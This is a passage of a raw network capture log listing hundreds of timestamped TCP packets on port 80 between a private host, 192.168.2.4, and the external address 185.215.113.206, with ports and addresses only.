Nov 11, 2024 01:14:17.175034046 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175035000 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175045013 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175048113 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175057888 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175067902 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175070047 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175080061 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175091028 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175091982 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175102949 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175112009 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175132990 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175164938 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175205946 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175223112 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175234079 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175244093 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175251961 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175256014 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175261974 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175268888 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175282001 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175296068 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175333023 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175549984 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175561905 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175573111 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175585032 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175595045 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175596952 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175606012 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175616026 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175618887 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175632000 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175638914 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175647974 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175656080 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175662041 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175676107 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175698996 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175724983 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175735950 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175748110 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175760984 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175771952 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175776958 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175796032 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175823927 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.175895929 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.175936937 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176078081 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176088095 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176096916 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176110029 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176119089 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176136971 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176166058 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176243067 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176254034 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176264048 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176275015 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176282883 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176289082 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176301956 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176311970 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176341057 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176389933 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176408052 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176419020 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176429033 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176435947 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176446915 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176453114 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176460028 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176470995 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176477909 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176482916 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.176518917 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.176529884 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177076101 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177088022 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177120924 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177139044 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177265882 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177278042 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177288055 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177299976 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177305937 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177313089 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177325964 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177339077 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177364111 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177421093 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177433014 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177443027 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177453995 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177463055 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177465916 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177479982 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177495003 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177522898 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177561045 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177572966 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177583933 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177594900 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177603006 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177607059 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177627087 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177627087 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177653074 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177680016 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177720070 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177731991 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177742958 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177755117 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177755117 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177766085 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177777052 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177781105 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177788973 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177795887 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177804947 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177829981 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177829981 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177844048 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177864075 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177875996 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.177910089 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.177928925 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178056002 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178066969 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178076982 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178090096 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178097963 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178101063 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178112030 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178123951 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178126097 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178150892 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178174019 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178226948 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178239107 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178247929 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178266048 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178272009 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178277969 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178291082 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178301096 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178301096 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178313017 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178313017 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178358078 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178385019 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178399086 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178410053 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178427935 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178452015 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178555965 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178567886 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178576946 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178587914 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178601027 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178606987 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178611994 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178616047 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178625107 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178637981 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178644896 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178648949 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178663015 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178672075 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178673983 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178683996 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178683996 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178695917 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178706884 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178715944 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178718090 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178741932 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178766966 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178873062 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178885937 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178895950 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178909063 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178916931 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178926945 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178937912 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178949118 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178953886 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178966999 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178973913 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178978920 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.178982973 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.178991079 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179002047 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179013968 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179018021 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179027081 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179038048 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179049015 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179053068 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179068089 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179073095 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179088116 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179088116 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179100990 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179109097 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179114103 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179124117 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179135084 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179135084 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179141045 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179147959 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179158926 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179169893 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179179907 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179179907 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179192066 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179200888 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179200888 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179219961 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179228067 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179244995 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179250002 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179255962 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179266930 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179270029 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179280043 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179291964 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179301023 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179302931 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179327965 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179331064 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179337978 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179349899 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179352045 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179366112 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179372072 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179384947 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179395914 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179405928 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179408073 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179416895 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179429054 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179429054 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179438114 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179440975 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179452896 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179465055 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179467916 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179477930 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179488897 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179492950 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179502964 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179519892 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179524899 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179524899 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179533005 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179543972 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179548025 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179557085 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179568052 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179570913 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179579973 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179590940 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179600000 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179603100 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179614067 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179616928 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179629087 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179637909 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179641008 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179651022 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179653883 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179668903 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179682970 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179687977 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179699898 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179709911 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179713964 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179722071 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179723978 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179734945 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179744005 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179749012 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179761887 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179775000 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179775000 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179786921 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179799080 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179801941 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179810047 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179816961 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179825068 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179841042 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179848909 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179860115 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179869890 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179872036 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179883957 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179892063 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179896116 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179904938 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179915905 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179919958 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179928064 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179941893 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179948092 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179955959 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179961920 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.179968119 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179982901 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.179986954 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.180002928 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180006981 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.180013895 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180025101 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180032015 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.180036068 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180047989 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180058956 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180059910 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.180069923 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180082083 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180087090 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.180094004 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180104017 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180115938 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180119038 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.180126905 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.180128098 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180140018 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180150986 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180154085 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.180167913 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180179119 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180187941 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:17.180191994 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:17.180200100 CET	80	49753	185.215.113.206	192.168.2.4
